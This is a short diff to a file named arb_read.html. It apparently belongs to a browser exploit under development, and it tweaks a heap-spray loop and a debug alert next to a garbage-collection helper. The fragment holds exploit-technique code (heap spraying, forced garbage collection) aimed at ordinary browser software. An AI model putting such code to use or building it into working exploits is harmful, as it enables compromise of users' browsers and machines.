--- a/arb_read.html
+++ b/arb_read.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start with uint8 value:0xA1A");
+alert("start with uint8 value:0xA21A");
 function gc() {
     try {
         var c = document.createElement("canvas");
@@ -58,7 +58,7 @@ try{
     }
     alert('ok2');
     for (var i=0; i<spray.length; i++) {
-        for (var j=0; j<cnt; j+=0x10) {
+        for (var j=0; j<cnt; j++) {
             spray[i][j] = 0x666;
         }
     }
